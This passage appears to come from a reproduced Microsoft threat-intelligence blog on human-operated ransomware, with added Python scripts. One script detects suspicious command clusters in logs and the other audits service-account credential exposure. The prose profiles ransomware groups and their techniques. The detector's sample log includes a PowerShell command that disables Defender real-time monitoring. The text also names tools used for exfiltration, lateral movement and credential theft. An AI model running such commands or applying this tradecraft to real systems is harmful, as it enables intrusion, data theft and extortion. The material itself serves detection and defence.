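2022-05-09T10:05:10Z host=WS01 user=CORP\jdoe cmd="powershell Get-MpComputerStatus"
2022-05-09T10:09:45Z host=WS01 user=CORP\jdoe cmd="powershell Set-MpPreference -DisableRealtimeMonitoring $true"
2022-05-09T11:20:00Z host=WS02 user=CORP\svc_backup cmd="gpupdate /force"
2022-05-09T15:00:00Z host=WS03 user=CORP\helpdesk cmd="net localgroup administrators"
2022-05-09T09:00:00Z host=WS03 user=CORP\helpdesk cmd="gpresult /r"
""".strip().splitlines()


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "host": m["host"],
        "user": m["user"],
        "cmd": m["cmd"],
    }


def classify(cmd):
    """Return the set of categories a command line matches (empty if none)."""
    text = cmd.lower()
    return {cat for cat, regexes in PATTERNS.items()
            if any(re.search(rx, text) for rx in regexes)}


def detect(lines, window=timedelta(minutes=30), min_categories=2):
    """Return one finding per host whose events inside `window` cover at least
    `min_categories` distinct categories. Any tampering raises the severity."""
    by_host = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        cats = classify(ev["cmd"])
        if cats:
            by_host[ev["host"]].append((ev["ts"], ev["user"], cats, ev["cmd"]))

    findings = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e[0])
        best = None
        for i, (start, _, _, _) in enumerate(events):
            seen, cmds = set(), []
            for ts, _, cats, cmd in events[i:]:
                if ts - start > window:
                    break
                seen |= cats
                cmds.append(cmd)
            # Keep the window with the widest category coverage for this host.
            if len(seen) >= min_categories and (
                    best is None or len(seen) > len(best["categories"])):
                best = {
                    "host": host,
                    "categories": sorted(seen),
                    "commands": cmds,
                    "severity": "critical" if "tamper" in seen else "high",
                }
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['severity'].upper()} {f['host']}: {', '.join(f['categories'])}")
```

In real use, the finding for WS01 is the kind of alert the text says should be investigated immediately, since tampering with the security product is typically minutes away from ransomware deployment.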
This human decision-making early in the reconnaissance and intrusion stages means that even if a target’s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks “in production” from an undetected location in their target’s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, by the time the attack reaches the stage of deleting backups or shadow copies, it is minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.

### Exfiltration and double extortion

Ransomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and “double extortion,” which refers to attackers threatening to leak data if a ransom hasn’t been paid, have also become common tactics among many RaaS affiliate programs—many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.

This trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don’t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attacker is DEV-0537 (also known as LAPSUS$), which is profiled below.

### Persistent and sneaky access methods

Paying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers’ demands doesn’t guarantee that attackers ever “pack their bags” and leave a network.
Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren’t successfully evicted.

The handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist, versus malware implants such as Cobalt Strike, is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.

Some of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:

 * AnyDesk
 * Atera Remote Management
 * ngrok.io
 * Remote Manipulator System
 * Splashtop
 * TeamViewer

Another popular technique attackers perform once they attain privileged access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol’s security, and add new users to the Remote Desktop Users group.

The time between initial access and a hands-on-keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can’t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher with these targets. Smaller organizations that can’t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars, because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware-associated threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.

Figure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022

The human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.

## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks

For organizations to successfully respond and evict an active attacker, it’s important to understand the active stage of an ongoing attack.
In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it’s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.

In the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:

 * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today
 * ELBRUS: (Un)arrested development
 * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs
 * DEV-0237: Prolific collaborator
 * DEV-0206 and DEV-0243: An “evil” partnership
 * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate
 * DEV-0537: From extortion to destruction

Microsoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled “Ransomware-linked emerging threat activity group detected”. We also add the note “Ongoing hands-on-keyboard attack” to alerts that indicate a human attacker is in the network. When these alerts are raised, it’s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.

A note on threat actor naming: as part of Microsoft’s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a “development group”. We use a naming structure with a prefix of “DEV” to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHORUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV stage. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use “contractors,” who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.

### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today

A vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter’s shutdown in June 2021, and Ryuk’s successor Conti, as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today.

DEV-0193’s actions and use of the cybercriminal gig economy mean they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups.
Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them under the DEV-0193 umbrella.

A subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444.

The leaked chat files from a group publicly labeled as the “Conti Group” in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload—even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the “Conti Group,” even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates—and the one responsible for developing the “Conti Manual” leaked in August 2021—is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.

### ELBRUS: (Un)arrested development

ELBRUS, also known as FIN7, has been in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.

In 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made of an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.

ELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called “Combi Security” and “Bastion Security” to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.

In 2020, ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and REvil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware.
The tendency to report on ransomware incidents based on payload and attribute them to a monolithic gang often obfuscates the true relationship between the attackers, which is very much the case with the DarkSide RaaS. Case in point: one of the most infamous DarkSide deployments wasn’t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.

ELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.

While they aren’t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations as of April 2022, an interesting pivot to using a less popular, authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low-privileged user credentials into highly privileged access as SYSTEM on an Exchange Server.

### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs

An excellent example of how clustering activity based on ransomware payload alone can obfuscate the threat actors behind an attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the “REvil gang” or “BlackCat ransomware group”. This attribution masks the actions of the set of attackers under the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment.

Figure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022

DEV-0504 shifts payloads when a RaaS program shuts down, such as the shutdowns of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren’t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older “fully owned” ransomware payloads like Phobos, which they can buy when a RaaS isn’t available or when they don’t want to pay the fees associated with RaaS programs.

DEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren’t protected with tamper protection.

DEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022.
Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.

### DEV-0237: Prolific collaborator

Like DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.

After the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn’t want Hive’s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.

Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022

Beyond RaaS payloads, DEV-0237 also uses the cybercriminal gig economy to gain initial access to networks. DEV-0237’s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups rather than performing their own initial compromise and malware development.

Figure 5. Examples of DEV-0237’s relationships with other cybercriminal activity groups

Like all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.

### DEV-0206 and DEV-0243: An “evil” partnership

Malvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to offer a browser update or a software package into downloading a ZIP file and double-clicking it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double-clicks the script.

Once successfully executed, the JavaScript framework, also referred to as [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243.
DEV-0243 falls under activities tracked by the cyber intelligence industry as “EvilCorp.” The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware’s inner payloads. In DEV-0243’s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.

Around November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the “EvilCorp” activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status.

Figure 6. The handover from DEV-0206 to DEV-0243

### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate

Differing from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)

DEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they prefer, DEV-0401 gains elevated credentials at the initial access stage of their attack.

Once inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.

Figure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022

Because DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).

Like many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay; however, their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempted to pay.
In a notable shift—possibly related to victim payment issues—DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.

### DEV-0537: From extortion to destruction

An example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums that were gathered by other password-stealing malware.

Once initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn’t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks.

DEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VoIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim’s data and resources.

## Defending against ransomware: Moving beyond protection by detection

A durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not be responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks.

Attackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven’t changed much over the years. Therefore, a renewed focus on prevention is needed to stem the tide.

Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key to disrupting the cybercriminal economy.

### Building credential hygiene

More than malware, attackers need credentials to succeed in their attacks.
In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.

Credential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn’t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.

Too often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access.
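As an added example of auditing for the misconfiguration described in this paragraph (it is not Microsoft's tooling and not code from the blog), the script below takes a constructed inventory of service and scheduled-task run-as accounts across hosts, skips identities whose credentials are not stored as a reusable secret on the host (the built-in Local System, Local Service and Network Service identities, and group managed service accounts, recognised here by the trailing `$` as a heuristic), and ranks the remaining domain accounts by exposure: a highly privileged account cached on any host is the worst case, followed by one ordinary account shared across several hosts. The host names, account names and the `PRIVILEGED_ACCOUNTS` set are assumptions; in practice the inventory would come from service-control and scheduled-task queries and the privileged set from a directory group lookup.

```python
"""Rank service/scheduled-task run-as accounts by credential exposure.
All inventory and group data below are constructed for the example."""
from dataclasses import dataclass

# Built-in identities: no password is stored for them on the host.
BUILTIN = {
    "localsystem", "nt authority\\system",
    "nt authority\\localservice", "nt authority\\networkservice",
}

# Constructed: accounts that hold Tier-0 / domain-admin level privileges.
PRIVILEGED_ACCOUNTS = {"contoso\\svc_backup", "contoso\\da_admin"}


@dataclass(frozen=True)
class RunAs:
    host: str
    kind: str       # "service" or "task"
    name: str
    account: str


# Constructed inventory of what runs as whom, on which host.
INVENTORY = [
    RunAs("app01", "service", "LegacyERP", "CONTOSO\\svc_backup"),
    RunAs("app02", "service", "LegacyERP", "CONTOSO\\svc_backup"),
    RunAs("file01", "task", "NightlyCopy", "CONTOSO\\da_admin"),
    RunAs("web01", "service", "W3SVC", "LocalSystem"),
    RunAs("db01", "service", "SQLAgent", "CONTOSO\\sqlagent$"),    # gMSA (heuristic: trailing $)
    RunAs("ws07", "task", "Inventory", "CONTOSO\\svc_inventory"),
]


def classify(account):
    """Bucket a run-as account: builtin, gmsa, domain_user or local_user."""
    a = account.lower()
    if a in BUILTIN:
        return "builtin"
    if a.endswith("$"):
        return "gmsa"
    if "\\" in a:
        return "domain_user"
    return "local_user"


def audit(inventory, privileged):
    """Return (severity, account, hosts, advice) tuples, worst first."""
    by_account = {}
    for item in inventory:
        by_account.setdefault(item.account.lower(), []).append(item)

    findings = []
    for acct, items in by_account.items():
        if classify(acct) in ("builtin", "gmsa"):
            continue    # nothing reusable is cached on the host for these
        hosts = sorted({i.host for i in items})
        if acct in privileged:
            sev = "high"
            advice = (f"privileged credential cached on {len(hosts)} host(s); "
                      "run as Local System or a gMSA, or use a dedicated least-privilege account")
        elif len(hosts) > 1:
            sev = "medium"
            advice = "same stored credential on several hosts; compromising one host exposes all"
        else:
            sev = "low"
            advice = "domain account used for a service or task; confirm it is least-privilege"
        findings.append((sev, acct, hosts, advice))

    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: (order[f[0]], f[1]))


if __name__ == "__main__":
    for sev, acct, hosts, advice in audit(INVENTORY, PRIVILEGED_ACCOUNTS):
        print(f"[{sev:6}] {acct:24} {','.join(hosts):14} {advice}")
```

Grouping by account rather than by host is the point of the exercise: a single privileged account configured on two application servers is one finding with two hosts, which is how an attacker sees it, since recovering the secret from either host yields the same credential.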
In organizations where the local administrator rights haven’t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.

**Here are some steps organizations can take to build credential hygiene:**

 * Aim to run services as Local System when administrative privileges are needed, as this allows application
